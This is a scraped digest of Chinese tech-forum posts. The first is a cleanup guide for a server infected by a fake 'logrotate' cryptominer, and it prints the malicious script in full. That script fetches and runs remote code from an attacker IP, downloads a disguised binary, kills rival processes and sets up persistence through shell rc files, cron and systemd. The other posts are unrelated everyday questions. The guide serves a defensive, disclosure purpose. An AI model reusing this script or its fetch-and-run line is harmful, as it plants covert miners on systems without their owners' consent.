标题: 服务器被植入恶意脚本“logrotate” 的清理步骤
作者: #沉默的小强
板块: #开发调优
编号: 851833
帖子: https://linux.do/t/topic/851833
时间: 2025-08-08 16:04:52
摘要:

涉及文件和目录：
$HOME/.bashrc
$HOME/.bash_logout
$HOME/.config/logrotate
/etc/rc.local
/etc/rc.d/rc.local
/etc/systemd/system/logrotate.service
/etc/crontab
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
1、清理定时任务
上面目录执行命令 lsattr logrotate :
返回： -----a-------e-- logrotate
chattr -a logrotate
rm -rf logrotate*
rm -rf logrotate
返回： -----i-------e-- logrotate
chattr -i logrotate
rm -rf logrotate*
rm -rf logrotate
返回： ----ia-------e-- logrotate
chattr -i logrotate
chattr -a logrotate
rm -rf logrotate*
rm -rf logrotate
修改 /etc/crontab
删除包含"source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"的所有内容
sudo sed -i ‘/source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)/d’ /etc/crontab
2、清理.bashrc和.bash_logout
删除文件中的"source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"
sudo sed -i ‘/source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)/d’ $HOME/.bashrc
sudo sed -i ‘/source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)/d’ $HOME/.bash_logout
觉得服务器把这两个文件删了也没关系
3、清理可执行文件和服务
systemctl disable logrotate.service
rm -rf $HOME/.config/logrotate $HOME/.config
rm -rf /etc/systemd/system/logrotate.service
4、清理开机启动项
sudo sed -i ‘/source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)/d’ /etc/rc.local
sudo sed -i ‘/source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)/d’ /etc/rc.d/rc.local
EXEC=“” #置空恶意程序变量
恶意脚本
#!/bin/sh
{ pkill -f xmrig || kill -9 $(pgrep -f 'xmrig'); } >/dev/null 2>&1
ps -eo pid,%cpu,comm --sort=-%cpu | awk 'NR>1 && !/awk|ps/ && !($3 ~ /^(logrotate|sshd|java)$/) && int($2) > 60 { system("kill -9 " $1) }'
EXEC="source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"
trap 'rm -- "$0"' EXIT
if [ -z "${HOME+x}" ]; then
   export HOME=/tmp
fi
mkdir -p "$HOME/.config" >/dev/null 2>&1
[ ! -f "$HOME/.config/logrotate" ] && { 
   ARCH=$(uname -m)
   URL=""
   [ "$ARCH" = "x86_64" ] && URL="http://185.196.8.123/silicon64blueprints.png"
   [ "$ARCH" = "aarch64" ] && URL="http://185.196.8.123/siliconarmblueprints.png"
   [ -z "$URL" ] && URL="http://185.196.8.123/silicon64blueprints.png"
   { wget -q -O "$HOME/.config/logrotate" "$URL" || curl -sL -o "$HOME/.config/logrotate" "$URL"; } >/dev/null 2>&1
   chmod +x "$HOME/.config/logrotate" >/dev/null 2>&1
}
pgrep -f "config/logrotate" >/dev/null 2>&1 || "$HOME/.config/logrotate"
add_to_startup() {
   if [ -r "$1" ]; then
       if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then
           echo "$EXEC >/dev/null 2>&1" >> "$1"
       fi
   fi
}
case "$(ps -p $$ -o comm=)" in
   bash) add_to_startup "$HOME/.bashrc"
         add_to_startup "$HOME/.bash_logout" ;;
   zsh) add_to_startup "$HOME/.zshrc" ;;
esac
[ "$(id -u)" -eq 0 ] && {
   RCLOCAL=''
   [ -e /etc/debian_version ] && RCLOCAL='/etc/rc.local'
   [ -e /etc/centos-release -o -e /etc/redhat-release ] && RCLOCAL='/etc/rc.d/rc.local'
   [ -n "$RCLOCAL" ] && add_to_startup "$RCLOCAL"
   cat >/etc/systemd/system/logrotate.service <<EOL
[Unit]
Description=The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files
[Service]
ExecStart=$HOME/.config/logrotate
Restart=always
Nice=-20
StandardOutput=null
[Install]
WantedBy=multi-user.target
EOL
   sudo systemctl daemon-reload 2>/dev/null
   sudo systemctl enable logrotate.service 2>/dev/null
   [ -d /var/spool/cron ] && [ -f /var/spool/cron/root ] && echo "@daily $EXEC" >> /var/spool/cron/root 2>/dev/null
   [ -d /var/spool/cron/crontabs ] && [ -f /var/spool/cron/crontabs/root ] && echo "@daily $EXEC" >> /var/sp

标题: 好无聊啊佬们，周五的下午这么难熬
作者: #bongmu
板块: #搞七捻三
编号: 851835
帖子: https://linux.do/t/topic/851835
时间: 2025-08-08 16:05:10
摘要:

摸了一上午了，还有2个小时

标题: siki学院-欢乐斗地主-Unity开发网络棋牌游戏 第二季
作者: #tomm
板块: #资源荟萃
编号: 851845
帖子: https://linux.do/t/topic/851845
时间: 2025-08-08 16:09:10
摘要:

📁 siki学院-欢乐斗地主-Unity开发网络棋牌游戏 第二季
  📄 课时111添加音效演示.mp4
  📄 课时16服务端接收消息.mp4
  📄 课时79客户端重新开始.mp4
  📄 课时41房间相关协议.mp4
  📄 课时67客户端获取开始玩家.mp4
  📄 课时14服务端json编码解码.mp4
  📄 课时87测试与改bug.mp4
  📄 课时55服务端准备.mp4
  📄 课时107同步左右玩家牌数.mp4
  📄 课时54测试以及bug修复(3).mp4
  📄 课时4客户端NetManager连接.mp4
  📄 课时8客户端NetManager发送.mp4
  📄 课时49服务端收到消息处理(2).mp4
  📄 课时38修复bug.mp4
  📄 课时105测试与改bug.mp4
  📄 课时82服务端判断抢地主.mp4
  📄 课时56客户端准备.mp4
  📄 课时106添加卡牌生成细节.mp4
  📄 课时44房间脚本(1).mp4
  📄 课时96出牌获取牌型.mp4
  📄 课时40制作房间面板.mp4
  📄 课时43房间列表脚本(2).mp4
  📄 课时15服务端Connect.mp4
  📄 课时21测试与bug修复.mp4
  📄 课时37完善面板及测试.mp4
  📄 课时91判断牌型(1).mp4
  📄 课时77测试与改bug.mp4
  📄 课时80测试与改bug.mp4
  📄 课时113MD5加密.mp4
  📄 课时84客户端处理抢地主.mp4
  📄 课时12客户端对消息处理.mp4
  📄 课时66测试与bug.mp4
  📄 课时85同步生成地主.mp4
  📄 课时83服务端判断抢地主(2).mp4
  📄 课时30服务端登录事件.mp4
  📄 课时52测试以及bug修复(2).mp4
  📄 课时22Player玩家管理.mp4
  📄 课时90出牌阶段.mp4
  📄 课时78服务端重新开始.mp4
  📄 课时9客户端消息处理.mp4
  📄 课时68服务端获取开始

标题: 丸辣 升级IOS26 Beta5后删除Loon VPN配置后无法重新加载
作者: #HRC
板块: #搞七捻三
编号: 851846
帖子: https://linux.do/t/topic/851846
时间: 2025-08-08 16:09:14
摘要:

点击完允许就卡在这个界面 也无法配置成功
咋修复呀 似乎重置网络配置也没有用

标题: GPT-5 官方 API 调用提示 invalid prompt
作者: #Luminus
板块: #开发调优
编号: 851849
帖子: https://linux.do/t/topic/851849
时间: 2025-08-08 16:09:50
摘要:

Invalid prompt: your prompt was flagged as potentially violating our usage policy. Please try again with a different prompt: https://platform.openai.com/docs/guides/reasoning#advice-on-prompting

有遇到类似问题的佬友吗？

标题: 这是gpt出bug了吗，显示1970到期
作者: # yuheng wang
板块: #搞七捻三
编号: 851850
帖子: https://linux.do/t/topic/851850
时间: 2025-08-08 16:10:20
摘要:

标题: 到底是谁在买公众号文章阅读量的啊？
作者: #小万要起飞
板块: #搞七捻三
编号: 851852
帖子: https://linux.do/t/topic/851852
时间: 2025-08-08 16:11:18
摘要:

我看有些人卖这个东西，但是不知道到底是什么人群在买。
好像都是一些官方号、地方号、品牌号，不知道里面到底啥逻辑，有懂的兄弟吗。他们要这个阅读量有啥用啊？

标题: 微信读书的听书功能
作者: #anyiyo
板块: #搞七捻三
编号: 851859
帖子: https://linux.do/t/topic/851859
时间: 2025-08-08 16:13:08
摘要:

最近在用微信读书看书，因为他的ai朗读功能语气音色等都令人满意。
然后就发现它有时候会把读音弄错，比如下面这段

骆一航赶紧离开，去找桄桄爷。这一系列事情的起点，其实是豌豆颠的上市，海量的礼道经带着骆一航修为往上冲。

会把第二个航读作xing
不知道有没有相关行业的大佬可以讲解一二，这可能是什么原因？
问题已经反馈给了微信读书团队，刚问我要了录屏，我也贴到这里给各位看一下
视频

标题: -麦克阿瑟玩法纪录片，不需高超的剪辑技术
作者: #|･ω･｀)
板块: #资源荟萃
编号: 851860
帖子: https://linux.do/t/topic/851860
时间: 2025-08-08 16:13:25
摘要:

通过网盘分享的文件：380-20240729-麦克阿瑟玩法纪录片，不需高超的剪辑技术
链接: https://pan.baidu.com/s/1ulBZh8JiuRjPDs3W1pTA2w?pwd=m5p3 提取码: m5p3

标题: 用了大佬的最新版去💩augment插件，但是注册登录后用不了几次就还是被封了(用了自搭节点)，各位佬友有这种情况吗？
作者: #Raiden
板块: #开发调优
编号: 851865
帖子: https://linux.do/t/topic/851865
时间: 2025-08-08 16:15:07
摘要:

大佬的插件确实很牛，但是为什么我换了同事自搭的节点也开了tun+全局模式，还是用不了几次就会被ban了呢？是哪里出问题了，有没有遇到同样情况的佬友？

标题: newapi 没办法兼容 gpt-5咋解决
作者: #林青枫
板块: #开发调优
编号: 851873
帖子: https://linux.do/t/topic/851873
时间: 2025-08-08 16:17:10
摘要:

status code 400: Unsupported parameter: 
'max_tokens' is not supported with this model. 
Use 'max_completion_tokens' instead.

在new API里面尝试 添加GPT-5模型一直报错

标题: jetbrains会成为下一个eclipse吗
作者: #xianzheTM
板块: #搞七捻三
编号: 851892
帖子: https://linux.do/t/topic/851892
时间: 2025-08-08 16:21:38
摘要:

今天去youtrack给IDEA提bug，结果发现同样的bug一年前就有了，一直不修，真的是感觉jetbrains走下坡路了。
AI做的一泡稀，之前还舔着脸发过一个博文指导如何从cursor迁移到IDEA，真的是招笑。
自身的功能也是做的越来越烂，每次新版的What’s news里面开头全是AI，剩下的功能没几个，然后翻以下完整的发布日志，全是修bug，结果还是到处是bug，一个bug已经不是按版本看修不修了，是要看按年修不修；基础功能不好好做，像是彩虹括号这种基础功能还要付费插件才能用，真是逆天，最骚的是官方还觉得我不能做，做了人家插件卖不了（https://youtrack.jetbrains.com/issue/RIDER-86523#focus=Comments-27-9999900.0-0）
感觉这些年一直乱投产能，真的是搞了好多东西，结果不是没做好，就是直接死掉了